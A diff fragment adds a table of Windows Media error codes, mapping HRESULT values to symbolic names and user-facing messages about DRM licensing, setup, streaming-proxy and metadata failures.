+ 0xC00D2737: ("NS_E_DRM_LICENSE_OPEN_ERROR", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D2738: ("NS_E_DRM_LICENSE_CLOSE_ERROR", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D2739: ("NS_E_DRM_GET_LICENSE_ERROR", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D273A: ("NS_E_DRM_QUERY_ERROR", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D273B: ("NS_E_DRM_REPORT_ERROR", "A problem has occurred in the Digital Rights Management component. Contact product support for this application."),
+ 0xC00D273C: ("NS_E_DRM_GET_LICENSESTRING_ERROR", "License storage is not working. Contact Microsoft product support."),
+ 0xC00D273D: ("NS_E_DRM_GET_CONTENTSTRING_ERROR", "The media file is corrupted. Contact the content provider to get a new file."),
+ 0xC00D273E: ("NS_E_DRM_MONITOR_ERROR", "A problem has occurred in the Digital Rights Management component. Try again later."),
+ 0xC00D273F: ("NS_E_DRM_UNABLE_TO_SET_PARAMETER", "The application has made an invalid call to the Digital Rights Management component. Contact product support for this application."),
+ 0xC00D2740: ("NS_E_DRM_INVALID_APPDATA", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2741: ("NS_E_DRM_INVALID_APPDATA_VERSION", "A problem has occurred in the Digital Rights Management component. Contact product support for this application."),
+ 0xC00D2742: ("NS_E_DRM_BACKUP_EXISTS", "Licenses are already backed up in this location."),
+ 0xC00D2743: ("NS_E_DRM_BACKUP_CORRUPT", "One or more backed-up licenses are missing or corrupt."),
+ 0xC00D2744: ("NS_E_DRM_BACKUPRESTORE_BUSY", "You cannot begin a new backup process until the current process has been completed."),
+ 0xC00D2745: ("NS_E_BACKUP_RESTORE_BAD_DATA", "Bad Data sent to Backup-Restore."),
+ 0xC00D2748: ("NS_E_DRM_LICENSE_UNUSABLE", "The license is invalid. Contact the content provider for further assistance."),
+ 0xC00D2749: ("NS_E_DRM_INVALID_PROPERTY", "A required property was not set by the application. Contact product support for this application."),
+ 0xC00D274A: ("NS_E_DRM_SECURE_STORE_NOT_FOUND", "A problem has occurred in the Digital Rights Management component of this application. Try to acquire a license again."),
+ 0xC00D274B: ("NS_E_DRM_CACHED_CONTENT_ERROR", "A license cannot be found for this media file. Use License Management to transfer a license for this file from the original computer, or acquire a new license."),
+ 0xC00D274C: ("NS_E_DRM_INDIVIDUALIZATION_INCOMPLETE", "A problem occurred during the security upgrade. Try again later."),
+ 0xC00D274D: ("NS_E_DRM_DRIVER_AUTH_FAILURE", "Certified driver components are required to play this media file. Contact Windows Update to see whether updated drivers are available for your hardware."),
+ 0xC00D274E: ("NS_E_DRM_NEED_UPGRADE_MSSAP", "One or more of the Secure Audio Path components were not found or an entry point in those components was not found."),
+ 0xC00D274F: ("NS_E_DRM_REOPEN_CONTENT", "Status message: Reopen the file."),
+ 0xC00D2750: ("NS_E_DRM_DRIVER_DIGIOUT_FAILURE", "Certain driver functionality is required to play this media file. Contact Windows Update to see whether updated drivers are available for your hardware."),
+ 0xC00D2751: ("NS_E_DRM_INVALID_SECURESTORE_PASSWORD", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2752: ("NS_E_DRM_APPCERT_REVOKED", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2753: ("NS_E_DRM_RESTORE_FRAUD", "You cannot restore your license(s)."),
+ 0xC00D2754: ("NS_E_DRM_HARDWARE_INCONSISTENT", "The licenses for your media files are corrupted. Contact Microsoft product support."),
+ 0xC00D2755: ("NS_E_DRM_SDMI_TRIGGER", "To transfer this media file, you must upgrade the application."),
+ 0xC00D2756: ("NS_E_DRM_SDMI_NOMORECOPIES", "You cannot make any more copies of this media file."),
+ 0xC00D2757: ("NS_E_DRM_UNABLE_TO_CREATE_HEADER_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2758: ("NS_E_DRM_UNABLE_TO_CREATE_KEYS_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2759: ("NS_E_DRM_LICENSE_NOTACQUIRED", "Unable to obtain license."),
+ 0xC00D275A: ("NS_E_DRM_UNABLE_TO_CREATE_CODING_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D275B: ("NS_E_DRM_UNABLE_TO_CREATE_STATE_DATA_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D275C: ("NS_E_DRM_BUFFER_TOO_SMALL", "The buffer supplied is not sufficient."),
+ 0xC00D275D: ("NS_E_DRM_UNSUPPORTED_PROPERTY", "The property requested is not supported."),
+ 0xC00D275E: ("NS_E_DRM_ERROR_BAD_NET_RESP", "The specified server cannot perform the requested operation."),
+ 0xC00D275F: ("NS_E_DRM_STORE_NOTALLSTORED", "Some of the licenses could not be stored."),
+ 0xC00D2760: ("NS_E_DRM_SECURITY_COMPONENT_SIGNATURE_INVALID", "The Digital Rights Management security upgrade component could not be validated. Contact Microsoft product support."),
+ 0xC00D2761: ("NS_E_DRM_INVALID_DATA", "Invalid or corrupt data was encountered."),
+ 0xC00D2762: ("NS_E_DRM_POLICY_DISABLE_ONLINE", "The Windows Media Digital Rights Management system cannot perform the requested action because your computer or network administrator has enabled the group policy Prevent Windows Media DRM Internet Access. For assistance, contact your administrator."),
+ 0xC00D2763: ("NS_E_DRM_UNABLE_TO_CREATE_AUTHENTICATION_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2764: ("NS_E_DRM_NOT_CONFIGURED", "Not all of the necessary properties for DRM have been set."),
+ 0xC00D2765: ("NS_E_DRM_DEVICE_ACTIVATION_CANCELED", "The portable device does not have the security required to copy protected files to it. To obtain the additional security, try to copy the file to your portable device again. When a message appears, click OK."),
+ 0xC00D2766: ("NS_E_BACKUP_RESTORE_TOO_MANY_RESETS", "Too many resets in Backup-Restore."),
+ 0xC00D2767: ("NS_E_DRM_DEBUGGING_NOT_ALLOWED", "Running this process under a debugger while using DRM content is not allowed."),
+ 0xC00D2768: ("NS_E_DRM_OPERATION_CANCELED", "The user canceled the DRM operation."),
+ 0xC00D2769: ("NS_E_DRM_RESTRICTIONS_NOT_RETRIEVED", "The license you are using has associated output restrictions. This license is unusable until these restrictions are queried."),
+ 0xC00D276A: ("NS_E_DRM_UNABLE_TO_CREATE_PLAYLIST_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D276B: ("NS_E_DRM_UNABLE_TO_CREATE_PLAYLIST_BURN_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D276C: ("NS_E_DRM_UNABLE_TO_CREATE_DEVICE_REGISTRATION_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D276D: ("NS_E_DRM_UNABLE_TO_CREATE_METERING_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2770: ("NS_E_DRM_TRACK_EXCEEDED_PLAYLIST_RESTICTION", "The specified track has exceeded it's specified playlist burn limit in this playlist."),
+ 0xC00D2771: ("NS_E_DRM_TRACK_EXCEEDED_TRACKBURN_RESTRICTION", "The specified track has exceeded it's track burn limit."),
+ 0xC00D2772: ("NS_E_DRM_UNABLE_TO_GET_DEVICE_CERT", "A problem has occurred in obtaining the device's certificate. Contact Microsoft product support."),
+ 0xC00D2773: ("NS_E_DRM_UNABLE_TO_GET_SECURE_CLOCK", "A problem has occurred in obtaining the device's secure clock. Contact Microsoft product support."),
+ 0xC00D2774: ("NS_E_DRM_UNABLE_TO_SET_SECURE_CLOCK", "A problem has occurred in setting the device's secure clock. Contact Microsoft product support."),
+ 0xC00D2775: ("NS_E_DRM_UNABLE_TO_GET_SECURE_CLOCK_FROM_SERVER", "A problem has occurred in obtaining the secure clock from server. Contact Microsoft product support."),
+ 0xC00D2776: ("NS_E_DRM_POLICY_METERING_DISABLED", "This content requires the metering policy to be enabled."),
+ 0xC00D2777: ("NS_E_DRM_TRANSFER_CHAINED_LICENSES_UNSUPPORTED", "Transfer of chained licenses unsupported."),
+ 0xC00D2778: ("NS_E_DRM_SDK_VERSIONMISMATCH", "The Digital Rights Management component is not installed properly. Reinstall the Player."),
+ 0xC00D2779: ("NS_E_DRM_LIC_NEEDS_DEVICE_CLOCK_SET", "The file could not be transferred because the device clock is not set."),
+ 0xC00D277A: ("NS_E_LICENSE_HEADER_MISSING_URL", "The content header is missing an acquisition URL."),
+ 0xC00D277B: ("NS_E_DEVICE_NOT_WMDRM_DEVICE", "The current attached device does not support WMDRM."),
+ 0xC00D277C: ("NS_E_DRM_INVALID_APPCERT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D277D: ("NS_E_DRM_PROTOCOL_FORCEFUL_TERMINATION_ON_PETITION", "The client application has been forcefully terminated during a DRM petition."),
+ 0xC00D277E: ("NS_E_DRM_PROTOCOL_FORCEFUL_TERMINATION_ON_CHALLENGE", "The client application has been forcefully terminated during a DRM challenge."),
+ 0xC00D277F: ("NS_E_DRM_CHECKPOINT_FAILED", "Secure storage protection error. Restore your licenses from a previous backup and try again."),
+ 0xC00D2780: ("NS_E_DRM_BB_UNABLE_TO_INITIALIZE", "A problem has occurred in the Digital Rights Management root of trust. Contact Microsoft product support."),
+ 0xC00D2781: ("NS_E_DRM_UNABLE_TO_LOAD_HARDWARE_ID", "A problem has occurred in retrieving the Digital Rights Management machine identification. Contact Microsoft product support."),
+ 0xC00D2782: ("NS_E_DRM_UNABLE_TO_OPEN_DATA_STORE", "A problem has occurred in opening the Digital Rights Management data storage file. Contact Microsoft product."),
+ 0xC00D2783: ("NS_E_DRM_DATASTORE_CORRUPT", "The Digital Rights Management data storage is not functioning properly. Contact Microsoft product support."),
+ 0xC00D2784: ("NS_E_DRM_UNABLE_TO_CREATE_INMEMORYSTORE_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2785: ("NS_E_DRM_STUBLIB_REQUIRED", "A secured library is required to access the requested functionality."),
+ 0xC00D2786: ("NS_E_DRM_UNABLE_TO_CREATE_CERTIFICATE_OBJECT", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2787: ("NS_E_DRM_MIGRATION_TARGET_NOT_ONLINE", "A problem has occurred in the Digital Rights Management component during license migration. Contact Microsoft product support."),
+ 0xC00D2788: ("NS_E_DRM_INVALID_MIGRATION_IMAGE", "A problem has occurred in the Digital Rights Management component during license migration. Contact Microsoft product support."),
+ 0xC00D2789: ("NS_E_DRM_MIGRATION_TARGET_STATES_CORRUPTED", "A problem has occurred in the Digital Rights Management component during license migration. Contact Microsoft product support."),
+ 0xC00D278A: ("NS_E_DRM_MIGRATION_IMPORTER_NOT_AVAILABLE", "A problem has occurred in the Digital Rights Management component during license migration. Contact Microsoft product support."),
+ 0xC00D278B: ("NS_DRM_E_MIGRATION_UPGRADE_WITH_DIFF_SID", "A problem has occurred in the Digital Rights Management component during license migration. Contact Microsoft product support."),
+ 0xC00D278C: ("NS_DRM_E_MIGRATION_SOURCE_MACHINE_IN_USE", "The Digital Rights Management component is in use during license migration. Contact Microsoft product support."),
+ 0xC00D278D: ("NS_DRM_E_MIGRATION_TARGET_MACHINE_LESS_THAN_LH", "Licenses are being migrated to a machine running XP or downlevel OS. This operation can only be performed on Windows Vista or a later OS. Contact Microsoft product support."),
+ 0xC00D278E: ("NS_DRM_E_MIGRATION_IMAGE_ALREADY_EXISTS", "Migration Image already exists. Contact Microsoft product support."),
+ 0xC00D278F: ("NS_E_DRM_HARDWAREID_MISMATCH", "The requested action cannot be performed because a hardware configuration change has been detected by the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D2790: ("NS_E_INVALID_DRMV2CLT_STUBLIB", "The wrong stublib has been linked to an application or DLL using drmv2clt.dll."),
+ 0xC00D2791: ("NS_E_DRM_MIGRATION_INVALID_LEGACYV2_DATA", "The legacy V2 data being imported is invalid."),
+ 0xC00D2792: ("NS_E_DRM_MIGRATION_LICENSE_ALREADY_EXISTS", "The license being imported already exists."),
+ 0xC00D2793: ("NS_E_DRM_MIGRATION_INVALID_LEGACYV2_SST_PASSWORD", "The password of the Legacy V2 SST entry being imported is incorrect."),
+ 0xC00D2794: ("NS_E_DRM_MIGRATION_NOT_SUPPORTED", "Migration is not supported by the plugin."),
+ 0xC00D2795: ("NS_E_DRM_UNABLE_TO_CREATE_MIGRATION_IMPORTER_OBJECT", "A migration importer cannot be created for this media file. Reinstall the application."),
+ 0xC00D2796: ("NS_E_DRM_CHECKPOINT_MISMATCH", "The requested action cannot be performed because a problem occurred with the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D2797: ("NS_E_DRM_CHECKPOINT_CORRUPT", "The requested action cannot be performed because a problem occurred with the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D2798: ("NS_E_REG_FLUSH_FAILURE", "The requested action cannot be performed because a problem occurred with the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D2799: ("NS_E_HDS_KEY_MISMATCH", "The requested action cannot be performed because a problem occurred with the Windows Media Digital Rights Management (DRM) components on your computer."),
+ 0xC00D279A: ("NS_E_DRM_MIGRATION_OPERATION_CANCELLED", "Migration was canceled by the user."),
+ 0xC00D279B: ("NS_E_DRM_MIGRATION_OBJECT_IN_USE", "Migration object is already in use and cannot be called until the current operation completes."),
+ 0xC00D279C: ("NS_E_DRM_MALFORMED_CONTENT_HEADER", "The content header does not comply with DRM requirements and cannot be used."),
+ 0xC00D27D8: ("NS_E_DRM_LICENSE_EXPIRED", "The license for this file has expired and is no longer valid. Contact your content provider for further assistance."),
+ 0xC00D27D9: ("NS_E_DRM_LICENSE_NOTENABLED", "The license for this file is not valid yet, but will be at a future date."),
+ 0xC00D27DA: ("NS_E_DRM_LICENSE_APPSECLOW", "The license for this file requires a higher level of security than the player you are currently using has. Try using a different player or download a newer version of your current player."),
+ 0xC00D27DB: ("NS_E_DRM_STORE_NEEDINDI", "The license cannot be stored as it requires security upgrade of Digital Rights Management component."),
+ 0xC00D27DC: ("NS_E_DRM_STORE_NOTALLOWED", "Your machine does not meet the requirements for storing the license."),
+ 0xC00D27DD: ("NS_E_DRM_LICENSE_APP_NOTALLOWED", "The license for this file requires an upgraded version of your player or a different player."),
+ 0xC00D27DF: ("NS_E_DRM_LICENSE_CERT_EXPIRED", "The license server's certificate expired. Make sure your system clock is set correctly. Contact your content provider for further assistance."),
+ 0xC00D27E0: ("NS_E_DRM_LICENSE_SECLOW", "The license for this file requires a higher level of security than the player you are currently using has. Try using a different player or download a newer version of your current player."),
+ 0xC00D27E1: ("NS_E_DRM_LICENSE_CONTENT_REVOKED", "The content owner for the license you just acquired is no longer supporting their content. Contact the content owner for a newer version of the content."),
+ 0xC00D27E2: ("NS_E_DRM_DEVICE_NOT_REGISTERED", "The content owner for the license you just acquired requires your device to register to the current machine."),
+ 0xC00D280A: ("NS_E_DRM_LICENSE_NOSAP", "The license for this file requires a feature that is not supported in your current player or operating system. You can try with newer version of your current player or contact your content provider for further assistance."),
+ 0xC00D280B: ("NS_E_DRM_LICENSE_NOSVP", "The license for this file requires a feature that is not supported in your current player or operating system. You can try with newer version of your current player or contact your content provider for further assistance."),
+ 0xC00D280C: ("NS_E_DRM_LICENSE_NOWDM", "The license for this file requires Windows Driver Model (WDM) audio drivers. Contact your sound card manufacturer for further assistance."),
+ 0xC00D280D: ("NS_E_DRM_LICENSE_NOTRUSTEDCODEC", "The license for this file requires a higher level of security than the player you are currently using has. Try using a different player or download a newer version of your current player."),
+ 0xC00D280E: ("NS_E_DRM_SOURCEID_NOT_SUPPORTED", "The license for this file is not supported by your current player. You can try with newer version of your current player or contact your content provider for further assistance."),
+ 0xC00D283D: ("NS_E_DRM_NEEDS_UPGRADE_TEMPFILE", "An updated version of your media player is required to play the selected content."),
+ 0xC00D283E: ("NS_E_DRM_NEED_UPGRADE_PD", "A new version of the Digital Rights Management component is required. Contact product support for this application to get the latest version."),
+ 0xC00D283F: ("NS_E_DRM_SIGNATURE_FAILURE", "Failed to either create or verify the content header."),
+ 0xC00D2840: ("NS_E_DRM_LICENSE_SERVER_INFO_MISSING", "Could not read the necessary information from the system registry."),
+ 0xC00D2841: ("NS_E_DRM_BUSY", "The DRM subsystem is currently locked by another application or user. Try again later."),
+ 0xC00D2842: ("NS_E_DRM_PD_TOO_MANY_DEVICES", "There are too many target devices registered on the portable media."),
+ 0xC00D2843: ("NS_E_DRM_INDIV_FRAUD", "The security upgrade cannot be completed because the allowed number of daily upgrades has been exceeded. Try again tomorrow."),
+ 0xC00D2844: ("NS_E_DRM_INDIV_NO_CABS", "The security upgrade cannot be completed because the server is unable to perform the operation. Try again later."),
+ 0xC00D2845: ("NS_E_DRM_INDIV_SERVICE_UNAVAILABLE", "The security upgrade cannot be performed because the server is not available. Try again later."),
+ 0xC00D2846: ("NS_E_DRM_RESTORE_SERVICE_UNAVAILABLE", "Windows Media Player cannot restore your licenses because the server is not available. Try again later."),
+ 0xC00D2847: ("NS_E_DRM_CLIENT_CODE_EXPIRED", "Windows Media Player cannot play the protected file. Verify that your computer's date is set correctly. If it is correct, on the Help menu, click Check for Player Updates to install the latest version of the Player."),
+ 0xC00D2848: ("NS_E_DRM_NO_UPLINK_LICENSE", "The chained license cannot be created because the referenced uplink license does not exist."),
+ 0xC00D2849: ("NS_E_DRM_INVALID_KID", "The specified KID is invalid."),
+ 0xC00D284A: ("NS_E_DRM_LICENSE_INITIALIZATION_ERROR", "License initialization did not work. Contact Microsoft product support."),
+ 0xC00D284C: ("NS_E_DRM_CHAIN_TOO_LONG", "The uplink license of a chained license cannot itself be a chained license."),
+ 0xC00D284D: ("NS_E_DRM_UNSUPPORTED_ALGORITHM", "The specified encryption algorithm is unsupported."),
+ 0xC00D284E: ("NS_E_DRM_LICENSE_DELETION_ERROR", "License deletion did not work. Contact Microsoft product support."),
+ 0xC00D28A0: ("NS_E_DRM_INVALID_CERTIFICATE", "The client's certificate is corrupted or the signature cannot be verified."),
+ 0xC00D28A1: ("NS_E_DRM_CERTIFICATE_REVOKED", "The client's certificate has been revoked."),
+ 0xC00D28A2: ("NS_E_DRM_LICENSE_UNAVAILABLE", "There is no license available for the requested action."),
+ 0xC00D28A3: ("NS_E_DRM_DEVICE_LIMIT_REACHED", "The maximum number of devices in use has been reached. Unable to open additional devices."),
+ 0xC00D28A4: ("NS_E_DRM_UNABLE_TO_VERIFY_PROXIMITY", "The proximity detection procedure could not confirm that the receiver is near the transmitter in the network."),
+ 0xC00D28A5: ("NS_E_DRM_MUST_REGISTER", "The client must be registered before executing the intended operation."),
+ 0xC00D28A6: ("NS_E_DRM_MUST_APPROVE", "The client must be approved before executing the intended operation."),
+ 0xC00D28A7: ("NS_E_DRM_MUST_REVALIDATE", "The client must be revalidated before executing the intended operation."),
+ 0xC00D28A8: ("NS_E_DRM_INVALID_PROXIMITY_RESPONSE", "The response to the proximity detection challenge is invalid."),
+ 0xC00D28A9: ("NS_E_DRM_INVALID_SESSION", "The requested session is invalid."),
+ 0xC00D28AA: ("NS_E_DRM_DEVICE_NOT_OPEN", "The device must be opened before it can be used to receive content."),
+ 0xC00D28AB: ("NS_E_DRM_DEVICE_ALREADY_REGISTERED", "Device registration failed because the device is already registered."),
+ 0xC00D28AC: ("NS_E_DRM_UNSUPPORTED_PROTOCOL_VERSION", "Unsupported WMDRM-ND protocol version."),
+ 0xC00D28AD: ("NS_E_DRM_UNSUPPORTED_ACTION", "The requested action is not supported."),
+ 0xC00D28AE: ("NS_E_DRM_CERTIFICATE_SECURITY_LEVEL_INADEQUATE", "The certificate does not have an adequate security level for the requested action."),
+ 0xC00D28AF: ("NS_E_DRM_UNABLE_TO_OPEN_PORT", "Unable to open the specified port for receiving Proximity messages."),
+ 0xC00D28B0: ("NS_E_DRM_BAD_REQUEST", "The message format is invalid."),
+ 0xC00D28B1: ("NS_E_DRM_INVALID_CRL", "The Certificate Revocation List is invalid or corrupted."),
+ 0xC00D28B2: ("NS_E_DRM_ATTRIBUTE_TOO_LONG", "The length of the attribute name or value is too long."),
+ 0xC00D28B3: ("NS_E_DRM_EXPIRED_LICENSEBLOB", "The license blob passed in the cardea request is expired."),
+ 0xC00D28B4: ("NS_E_DRM_INVALID_LICENSEBLOB", "The license blob passed in the cardea request is invalid. Contact Microsoft product support."),
+ 0xC00D28B5: ("NS_E_DRM_INCLUSION_LIST_REQUIRED", "The requested operation cannot be performed because the license does not contain an inclusion list."),
+ 0xC00D28B6: ("NS_E_DRM_DRMV2CLT_REVOKED", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D28B7: ("NS_E_DRM_RIV_TOO_SMALL", "A problem has occurred in the Digital Rights Management component. Contact Microsoft product support."),
+ 0xC00D2904: ("NS_E_OUTPUT_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of output protection required by the content."),
+ 0xC00D2905: ("NS_E_COMPRESSED_DIGITAL_VIDEO_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of protection required for compressed digital video."),
+ 0xC00D2906: ("NS_E_UNCOMPRESSED_DIGITAL_VIDEO_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of protection required for uncompressed digital video."),
+ 0xC00D2907: ("NS_E_ANALOG_VIDEO_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of protection required for analog video."),
+ 0xC00D2908: ("NS_E_COMPRESSED_DIGITAL_AUDIO_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of protection required for compressed digital audio."),
+ 0xC00D2909: ("NS_E_UNCOMPRESSED_DIGITAL_AUDIO_PROTECTION_LEVEL_UNSUPPORTED", "Windows Media Player does not support the level of protection required for uncompressed digital audio."),
+ 0xC00D290A: ("NS_E_OUTPUT_PROTECTION_SCHEME_UNSUPPORTED", "Windows Media Player does not support the scheme of output protection required by the content."),
+ 0xC00D2AFA: ("NS_E_REBOOT_RECOMMENDED", "Installation was not successful and some file cleanup is not complete. For best results, restart your computer."),
+ 0xC00D2AFB: ("NS_E_REBOOT_REQUIRED", "Installation was not successful. To continue, you must restart your computer."),
+ 0xC00D2AFC: ("NS_E_SETUP_INCOMPLETE", "Installation was not successful."),
+ 0xC00D2AFD: ("NS_E_SETUP_DRM_MIGRATION_FAILED", "Setup cannot migrate the Windows Media Digital Rights Management (DRM) components."),
+ 0xC00D2AFE: ("NS_E_SETUP_IGNORABLE_FAILURE", "Some skin or playlist components cannot be installed."),
+ 0xC00D2AFF: ("NS_E_SETUP_DRM_MIGRATION_FAILED_AND_IGNORABLE_FAILURE", "Setup cannot migrate the Windows Media Digital Rights Management (DRM) components. In addition, some skin or playlist components cannot be installed."),
+ 0xC00D2B00: ("NS_E_SETUP_BLOCKED", "Installation is blocked because your computer does not meet one or more of the setup requirements."),
+ 0xC00D2EE0: ("NS_E_UNKNOWN_PROTOCOL", "The specified protocol is not supported."),
+ 0xC00D2EE1: ("NS_E_REDIRECT_TO_PROXY", "The client is redirected to a proxy server."),
+ 0xC00D2EE2: ("NS_E_INTERNAL_SERVER_ERROR", "The server encountered an unexpected condition which prevented it from fulfilling the request."),
+ 0xC00D2EE3: ("NS_E_BAD_REQUEST", "The request could not be understood by the server."),
+ 0xC00D2EE4: ("NS_E_ERROR_FROM_PROXY", "The proxy experienced an error while attempting to contact the media server."),
+ 0xC00D2EE5: ("NS_E_PROXY_TIMEOUT", "The proxy did not receive a timely response while attempting to contact the media server."),
+ 0xC00D2EE6: ("NS_E_SERVER_UNAVAILABLE", "The server is currently unable to handle the request due to a temporary overloading or maintenance of the server."),
+ 0xC00D2EE7: ("NS_E_REFUSED_BY_SERVER", "The server is refusing to fulfill the requested operation."),
+ 0xC00D2EE8: ("NS_E_INCOMPATIBLE_SERVER", "The server is not a compatible streaming media server."),
+ 0xC00D2EE9: ("NS_E_MULTICAST_DISABLED", "The content cannot be streamed because the Multicast protocol has been disabled."),
+ 0xC00D2EEA: ("NS_E_INVALID_REDIRECT", "The server redirected the player to an invalid location."),
+ 0xC00D2EEB: ("NS_E_ALL_PROTOCOLS_DISABLED", "The content cannot be streamed because all protocols have been disabled."),
+ 0xC00D2EEC: ("NS_E_MSBD_NO_LONGER_SUPPORTED", "The MSBD protocol is no longer supported. Please use HTTP to connect to the Windows Media stream."),
+ 0xC00D2EED: ("NS_E_PROXY_NOT_FOUND", "The proxy server could not be located. Please check your proxy server configuration."),
+ 0xC00D2EEE: ("NS_E_CANNOT_CONNECT_TO_PROXY", "Unable to establish a connection to the proxy server. Please check your proxy server configuration."),
+ 0xC00D2EEF: ("NS_E_SERVER_DNS_TIMEOUT", "Unable to locate the media server. The operation timed out."),
+ 0xC00D2EF0: ("NS_E_PROXY_DNS_TIMEOUT", "Unable to locate the proxy server. The operation timed out."),
+ 0xC00D2EF1: ("NS_E_CLOSED_ON_SUSPEND", "Media closed because Windows was shut down."),
+ 0xC00D2EF2: ("NS_E_CANNOT_READ_PLAYLIST_FROM_MEDIASERVER", "Unable to read the contents of a playlist file from a media server."),
+ 0xC00D2EF3: ("NS_E_SESSION_NOT_FOUND", "Session not found."),
+ 0xC00D2EF4: ("NS_E_REQUIRE_STREAMING_CLIENT", "Content requires a streaming media client."),
+ 0xC00D2EF5: ("NS_E_PLAYLIST_ENTRY_HAS_CHANGED", "A command applies to a previous playlist entry."),
+ 0xC00D2EF6: ("NS_E_PROXY_ACCESSDENIED", "The proxy server is denying access. The username and/or password might be incorrect."),
+ 0xC00D2EF7: ("NS_E_PROXY_SOURCE_ACCESSDENIED", "The proxy could not provide valid authentication credentials to the media server."),
+ 0xC00D2EF8: ("NS_E_NETWORK_SINK_WRITE", "The network sink failed to write data to the network."),
+ 0xC00D2EF9: ("NS_E_FIREWALL", "Packets are not being received from the server. The packets might be blocked by a filtering device, such as a network firewall."),
+ 0xC00D2EFA: ("NS_E_MMS_NOT_SUPPORTED", "The MMS protocol is not supported. Please use HTTP or RTSP to connect to the Windows Media stream."),
+ 0xC00D2EFB: ("NS_E_SERVER_ACCESSDENIED", "The Windows Media server is denying access. The username and/or password might be incorrect."),
+ 0xC00D2EFC: ("NS_E_RESOURCE_GONE", "The Publishing Point or file on the Windows Media Server is no longer available."),
+ 0xC00D2EFD: ("NS_E_NO_EXISTING_PACKETIZER", "There is no existing packetizer plugin for a stream."),
+ 0xC00D2EFE: ("NS_E_BAD_SYNTAX_IN_SERVER_RESPONSE", "The response from the media server could not be understood. This might be caused by an incompatible proxy server or media server."),
+ 0xC00D2F00: ("NS_E_RESET_SOCKET_CONNECTION", "The Windows Media Server reset the network connection."),
+ 0xC00D2F02: ("NS_E_TOO_MANY_HOPS", "The request could not reach the media server (too many hops)."),
+ 0xC00D2F05: ("NS_E_TOO_MUCH_DATA_FROM_SERVER", "The server is sending too much data. The connection has been terminated."),
+ 0xC00D2F06: ("NS_E_CONNECT_TIMEOUT", "It was not possible to establish a connection to the media server in a timely manner. The media server may be down for maintenance, or it may be necessary to use a proxy server to access this media server."),
+ 0xC00D2F07: ("NS_E_PROXY_CONNECT_TIMEOUT", "It was not possible to establish a connection to the proxy server in a timely manner. Please check your proxy server configuration."),
+ 0xC00D2F08: ("NS_E_SESSION_INVALID", "Session not found."),
+ 0xC00D2F0A: ("NS_E_PACKETSINK_UNKNOWN_FEC_STREAM", "Unknown packet sink stream."),
+ 0xC00D2F0B: ("NS_E_PUSH_CANNOTCONNECT", "Unable to establish a connection to the server. Ensure Windows Media Services is started and the HTTP Server control protocol is properly enabled."),
+ 0xC00D2F0C: ("NS_E_INCOMPATIBLE_PUSH_SERVER", "The Server service that received the HTTP push request is not a compatible version of Windows Media Services (WMS). This error may indicate the push request was received by IIS instead of WMS. Ensure WMS is started and has the HTTP Server control protocol properly enabled and try again."),
+ 0xC00D32C8: ("NS_E_END_OF_PLAYLIST", "The playlist has reached its end."),
+ 0xC00D32C9: ("NS_E_USE_FILE_SOURCE", "Use file source."),
+ 0xC00D32CA: ("NS_E_PROPERTY_NOT_FOUND", "The property was not found."),
+ 0xC00D32CC: ("NS_E_PROPERTY_READ_ONLY", "The property is read only."),
+ 0xC00D32CD: ("NS_E_TABLE_KEY_NOT_FOUND", "The table key was not found."),
+ 0xC00D32CF: ("NS_E_INVALID_QUERY_OPERATOR", "Invalid query operator."),
+ 0xC00D32D0: ("NS_E_INVALID_QUERY_PROPERTY", "Invalid query property."),
+ 0xC00D32D2: ("NS_E_PROPERTY_NOT_SUPPORTED", "The property is not supported."),
+ 0xC00D32D4: ("NS_E_SCHEMA_CLASSIFY_FAILURE", "Schema classification failure."),
+ 0xC00D32D5: ("NS_E_METADATA_FORMAT_NOT_SUPPORTED", "The metadata format is not supported."),
+ 0xC00D32D6: ("NS_E_METADATA_NO_EDITING_CAPABILITY", "Cannot edit the metadata."),
+ 0xC00D32D7: ("NS_E_METADATA_CANNOT_SET_LOCALE", "Cannot set the locale id."),
+ 0xC00D32D8: ("NS_E_METADATA_LANGUAGE_NOT_SUPORTED", "The language is not supported in the format."),
+ 0xC00D32D9: ("NS_E_METADATA_NO_RFC1766_NAME_FOR_LOCALE", "There is no RFC1766 name translation for the supplied locale id."),
+ 0xC00D32DA: ("NS_E_METADATA_NOT_AVAILABLE", "The metadata (or metadata item) is not available."),
+ 0xC00D32DB: ("NS_E_METADATA_CACHE_DATA_NOT_AVAILABLE", "The cached metadata (or metadata item) is not available."),
